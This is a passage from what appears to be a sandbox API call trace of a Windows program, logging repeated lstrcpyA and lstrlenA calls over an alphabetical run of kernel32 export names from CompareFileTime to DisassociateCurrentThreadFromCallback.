lstrlenA (lpString="COMPAREFILETIME") returned 15 [0076.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0076.602] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0076.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0076.602] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0076.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0076.602] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0076.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0076.602] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0076.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0076.603] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0076.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0076.603] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0076.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0076.603] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0076.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0076.603] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0076.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0076.603] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0076.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0076.603] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0076.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0076.603] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0076.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0076.603] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0076.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0076.603] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0076.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0076.603] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0076.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0076.603] lstrlenA (lpString="COPYCONTEXT") returned 11 [0076.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0076.603] lstrlenA (lpString="COPYFILEA") returned 9 [0076.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0076.603] lstrlenA (lpString="COPYFILEEXA") returned 11 [0076.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0076.603] lstrlenA (lpString="COPYFILEEXW") returned 11 [0076.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0076.603] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0076.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0076.603] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0076.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0076.603] lstrlenA (lpString="COPYFILEW") returned 9 [0076.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0076.604] lstrlenA (lpString="COPYLZFILE") returned 10 [0076.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0076.604] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0076.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0076.604] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0076.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0076.604] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0076.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0076.604] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0076.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0076.604] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0076.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0076.604] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0076.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0076.604] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0076.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0076.604] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0076.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0076.604] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0076.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0076.604] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0076.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0076.604] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0076.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0076.604] lstrlenA (lpString="CREATEEVENTA") returned 12 [0076.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0076.604] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0076.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0076.604] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0076.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0076.604] lstrlenA (lpString="CREATEEVENTW") returned 12 [0076.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0076.604] lstrlenA (lpString="CREATEFIBER") returned 11 [0076.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0076.605] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0076.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0076.605] lstrlenA (lpString="CREATEFILEA") returned 11 [0076.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0076.605] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0076.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0076.605] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0076.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0076.605] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0076.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0076.605] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0076.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0076.605] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0076.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0076.605] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0076.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0076.605] lstrlenA (lpString="CREATEFILEW") returned 11 [0076.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0076.605] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0076.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0076.605] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0076.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0076.605] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0076.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0076.605] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0076.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0076.605] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0076.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0076.605] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0076.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0076.605] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0076.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0076.605] lstrlenA (lpString="CREATEJOBSET") returned 12 [0076.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0076.605] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0076.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0076.606] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0076.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0076.606] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0076.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0076.606] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0076.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0076.606] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0076.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0076.606] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0076.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0076.606] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0076.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0076.606] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0076.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0076.606] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0076.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0076.606] lstrlenA (lpString="CREATEPIPE") returned 10 [0076.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0076.606] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0076.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0076.606] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0076.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0076.606] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0076.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0076.606] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0076.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0076.606] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0076.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0076.606] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0076.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0076.606] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0076.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0076.606] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0076.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0076.607] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0076.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0076.607] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0076.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0076.607] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0076.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0076.607] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0076.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0076.607] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0076.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0076.607] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0076.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0076.607] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0076.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0076.607] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0076.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0076.607] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0076.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0076.607] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0076.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0076.607] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0076.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0076.607] lstrlenA (lpString="CREATETHREAD") returned 12 [0076.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0076.607] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0076.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0076.607] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0076.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0076.607] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0076.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0076.607] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0076.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0076.607] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0076.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0076.607] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0076.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0076.608] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0076.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0076.608] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0076.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0076.608] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0076.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0076.608] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0076.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0076.608] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0076.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0076.608] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0076.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0076.608] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0076.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0076.608] lstrlenA (lpString="CTRLROUTINE") returned 11 [0076.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0076.608] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0076.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0076.608] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0076.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0076.608] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0076.609] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0076.609] lstrlenA (lpString="DEBUGBREAK") returned 10 [0076.609] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0076.609] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0076.609] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0076.609] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0076.609] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0076.609] lstrlenA (lpString="DECODEPOINTER") returned 13 [0076.609] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0076.609] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0076.609] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0076.609] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0076.609] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0076.609] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0076.609] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0076.609] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0076.609] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0076.609] lstrlenA (lpString="DELETEATOM") returned 10 [0076.609] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0076.609] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0076.609] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0076.609] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0076.609] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0076.609] lstrlenA (lpString="DELETEFIBER") returned 11 [0076.609] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0076.609] lstrlenA (lpString="DELETEFILEA") returned 11 [0076.609] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0076.609] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0076.609] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0076.609] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0076.609] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0076.609] lstrlenA (lpString="DELETEFILEW") returned 11 [0076.609] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0076.609] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0076.610] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0076.610] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0076.610] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0076.610] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0076.610] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0076.610] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0076.610] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0076.610] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0076.610] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0076.610] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0076.610] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0076.610] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0076.610] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0076.610] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0076.610] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0076.610] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0076.610] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0076.610] 